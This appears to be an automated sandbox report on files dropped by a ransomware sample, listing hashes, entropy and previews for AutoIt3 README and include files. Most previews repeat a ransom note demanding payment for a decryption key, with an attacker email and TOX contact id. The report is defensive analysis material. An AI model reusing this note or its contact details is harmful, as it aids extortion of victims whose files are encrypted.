                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Examples\GUI\Simple\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Examples\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\Editors\Crimson\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\Editors\Notepad++\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\Editors\PSPad\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\Editors\Sublime Text\README.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\Editors\TextPad\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Extras\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Icons\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Include\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Include\StringConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3462
                                Entropy (8bit):7.940917216573625
                                Encrypted:false
                                SSDEEP:96:vzykSMVNYouBXofDeVhm7GSKlpycLPqMevuAVOfh:rykdV6BYfDWhmCTyczqM+VOp
                                MD5:EC862B4F15B1E1B093AF21D3D30B5D54
                                SHA1:FC87989D1E58611418CAC99751C5A8F1315ED0E0
                                SHA-256:C6A55D67958D9BA421D8468B620C885AA43CCBE89F7513EBDCC96675F682622C
                                SHA-512:6BA46FEDD864068956F576BCC5359F725CB4E6A5149987015BEEB8E0D50588F14B1505DEDAFE00873315917AB2D725214664CCAC505018DCD821E97EF1EBA470
                                Malicious:false
                                Preview:...c.`o.h.......1u.$......u..Ka..M.'..i.=.......b.Y..4"...&.=.~..*i^..f...W...../X..1.n..xS-^...S9'..G...}IT.}.B.&...........)Ou.....% -.....L....+)4.`n..'.9.<.C..,.+.N.e=...`...L..t%..2...D.V.....^..?....._m.~....V..6......A...O..:......K..-..}Nn..|..E.Zfz.f/[$...Q.=."n\./\E8p......$...l....>.S.x...o......a.CO..~.,.d5.2..N..3..B.!.$FT.L.&9....k.?}..Q..*.....v.IF..T...I.....|I.R....L%..IQ...~4".-'...@(d...`.Nj..Q.!....5,... ;u.^{s.6 ......8....F?n.(..$'.oF.q.b.(.)Jd....8I./..*.q.....ZX.F.6......!.........<........Mw#{8..b..:..2.....zv.E.1..z9.Wb...a's..........?....T.)......fyS.W.I..s..O.R.....u.Iv.O.... $......:..o=....G.0.....q.@E..M]].E............e..y..|.i.xAV.S...4^......D..{....p.AKjm.5\......0F.QQ=.M....5l..!....{..#....~......_..$.}i..=.u{....LOikC.;AO.u.2`.r.F.b<x.. j.Qb.MI.....v\.&...#.[....7B.....D.zY..p.."9..*Z..b...0{.....S...WF.....Gg.;.m6.OR.r.O!].B.........>.P.|...$.R2..o.x.N....F....M.J..PON9.s....r.8/

                                C:\Program Files (x86)\AutoIt3\Include\StructureConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64878
                                Entropy (8bit):7.997374523369192
                                Encrypted:true
                                SSDEEP:1536:mGzMDm97mWHuma/m8ogMsczPjsQ/AZJz/+jyv0U7E3kYd:mGIDm97mXma+MNCAGCV/+RR3L
                                MD5:AF6BCD827E25579D2E48FDE08714F93B
                                SHA1:46CCA749B27C16402BB064E1C07D4AE480A16EE1
                                SHA-256:0E8FF2CE34CF7F87578C0659A234B52D53C468D0F77C25EB7896B204A9125D5E
                                SHA-512:01FC0232435F459D849F1881A01B067E6475505CE18B7B1F0A474C73C6A40DD4F65F9BCA0D913DDBE498CEB00D7345C41CF1CE9BB5D1985716D760E682B6305D
                                Malicious:true
                                Preview:A.h.C....+G.w.........6.K..A...W_U.9l.sg~.]g..i.........h2o..+R8,..v?}.U.a...0.{...7@....s.S......"...u+.....Q)h.Z.qzB.E[=@N.?.B.jK.X.@_.#.x...<.!......%...{~.^.6....k...H..o.....W._.5.9....4..G..DXK:..AyB?...........q....0.*8_.^iE5..L..+....O..z<..wFX...LY.z."B.....F..q...N...h.<.e\..Di.4.5..I.9...)...9. ..,4\.ft..W....`..m.....E........T=...`*.T;..B^.B,.&...._....G5..C.......R.....GAS.46.}.G.KV...]m..9.jQ..,.@..f......zj.......Z..|k.A.9.%E...H..o...k...Dw?s1.0+....:cf...3....n]...*(...b...[1..u..QK.E..................(tZ.....0Y...o...........1..g..q..."[...!t.zs..`..%...Z..E....;R?hjI..0."f..6...&.w.t..H......QD...G.G!....*...DS...I$....pQ...9..F&/vR!..4..G....jaa.....]?\/.!."#....|..B......6.....`Q[C...V..~W.1._.k.$l+.. .,G.w.".T..b....?..}%..4;5......1O*..9v(?.M..}N...........u..7!.........J2..^A.j`Zl...@.^F..^<A'.wy..u.....A.!.....7.w...,...dI-B=.["...f).Y.o..k..E.........i"O..I.i+j.+..tN.\"...5r.........QhF^....;h.....i5.7......2d.

                                C:\Program Files (x86)\AutoIt3\Include\TabConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6801
                                Entropy (8bit):7.972191929260046
                                Encrypted:false
                                SSDEEP:192:6fhPWgVkJwaFjVonsPAek/S68nTTd4wnZdKJyVrkJMkIh0+VOV:6fEgVIj+nsnk/SNnPrZdGErbkIh0+VOV
                                MD5:78A4C61DB2327F3F1E8AB2D36F80E681
                                SHA1:7A6D361C8CC0E8BE8CA52DAD4F3E150194BD60D6
                                SHA-256:9A10B1CBBAFF564343DC534D9EEEAC31E2AFF37A4F1EC800FF6BB6CB40453C49
                                SHA-512:56DD2C11F44E17E6884431B125105792412604104F4FEBF77D9C305B9FB3744E69470DDC8C0E8ACB43DCF8A407A33A444D964AC6416FE7C68DC1DAEE54A011B1
                                Malicious:false
                                Preview:?S....br......Z.lU...d..b....l....K...c....5.j...aK,.xF.u...AW.K@(\~..P..<.....4q.#....V.g..4,...M+Z...j...s........9.X.....>...y.<.2....A....*.x%..#2...bLLD.**..X1.....}...J{...+.t$x0...l'DDF...G....>4.)[.l...~.Ent.<.Jw.P...N..rU..oK.q)<.....p.......w...5..^....W.R..nw"..y.y6.U.......#r~.A0Jd....$...RS...M+0...9...m.f.5y..?.....O....8...ws.....+&L...[...o).@.=.X.#.....$<..[..6:.4.t.../.?..R...^.\.F{...T.[:..F&{.+...K.#.TYM.,.z.[4.....>.D..t...3J 3...@.^.......:.....+.....4..f...X.ec....F...Q..".........V..........y.....mi..<....XSB...."a.......t?.e.:.R....-an].A...0:4.......VH.....w..j.|.$.?......-..DO._.u.......|...@........=.....;...vO.Y...NI.<..X.\...S."...k..H..Q,d..f...(...Y...a.W.t.`Pl....6...1.../..,...].Fu.8.N....l.....N...VeHF...uyZ..........B....W...,@....W.BNT!......dG>......{..g`l...{}..kg6.l... j...V.U.K5H.......Iz,".P$B},....3....]g}0."Y...,.......C.{]l7R........P.B.i.B...D&j.z.<Z....(..*q.s|......Q@^...JfX.cJ.....H.H

                                C:\Program Files (x86)\AutoIt3\Include\Timers.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12443
                                Entropy (8bit):7.985215528092471
                                Encrypted:false
                                SSDEEP:384:Y5+dQGeZXLFStcMW47H+tkWtMFNYt5QaGCQL8lo618ZR4+VOd:5dQGCGcur+tkNYQabY8ld/Z
                                MD5:C796F4D03DFB0EF210F32E727BAD98FA
                                SHA1:AE263A8FFC9EDA3FD853471768AD3D8264C92F56
                                SHA-256:6CA4D4DA485DF413F3FEA6CD2A22798D998FF9D936044722B17B5F13EA84A3B9
                                SHA-512:5612B4CF503828AE16D3ECD1BBF2F774D99BE6ED0CCED135584D0186A4BAF51A0EB076F484AA6869739B2D180F52F35E6E49C6925C2D3F5F7406A013B1FCFC13
                                Malicious:false
                                Preview:n$.Zs%.8....:.yB..Y.t.s.......Y....hf..W4.....|=....(..........Sa...V"../h....{.Q.t..7...#]y...@.+...t<.J'6.@Y.{.#../..Y.w...y.9.[..W$U.Wa."6..-.j`;\...)j.y.B.g..pm..u....z.q2....%t~,.-I^.....P.......\.........n.....q....7Y.7X...Zw.1...E...z.'Z.~.t.G.;...dJ.g..C.....!t..Ed...A#..,...V.....\..jIC..Q[..@..D*...!.}...H......d....\.Q7.\.1A.c.W.6.Mv.<.-cO......v..Ll4.z...fx....P...(z..b...[..`..#5.a.G..]..V.<..G...T.`,...k..Y.[..3c.a.dR...../.}.+..W._.h;.1.I..O.9..r.....%.......I......... ..td.eC....f.A..^&..[..E....5.L@!..~~.3..V...LB.w.9_.F.e*K.MV..J..z%......~..[.....l.Z[ME(.....Cm...".J.m...|..O.0...n.?+I.N..........e...~.6...K[Q...Z5?T....{.x....'Zb."H.<.......G..X..D.....6%7.!'.3...1z.C........... <....UGW...".N.....J..u..+,.Y..H...R..%.:..-^J...4..ui$..h.........~r..K.z........)..}...N..a..X....4.O.c.K...{.....Vf.....f...O.......`x.....C.^..z}.....p....>......]..9#n...>,|...fn.|.V.*..R.;.p..Sm:....y........0R....PZ2..?k...../..v<.j

                                C:\Program Files (x86)\AutoIt3\Include\ToolTipConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6134
                                Entropy (8bit):7.969404432664336
                                Encrypted:false
                                SSDEEP:96:AMD5w5uhX3YEqVaHKDXD35Ia2p4+IPDLs6LXetUmd+7mb1RsUD8mHPuspSvV0GgE:hVwE3Y7fz3H6/wU6LXet/vRzvPuSSaGx
                                MD5:7B44CCB97188BF079BB944B1BB631DFE
                                SHA1:872B85954E6362B139A7DF6DDBB6AEF75A2B13BF
                                SHA-256:9D6D33EBC9BF67174530B7516AFB035FA7070557DE1ADCA238A3887318E9BC66
                                SHA-512:EB3AB577DC02FBA9C89C3987EE37657B831E448F51D9E544E4B4973896DE626049E5FB05E0D577B51B0A2D4A52406859E594D47727F5E403391B8D5BB4DF926C
                                Malicious:false
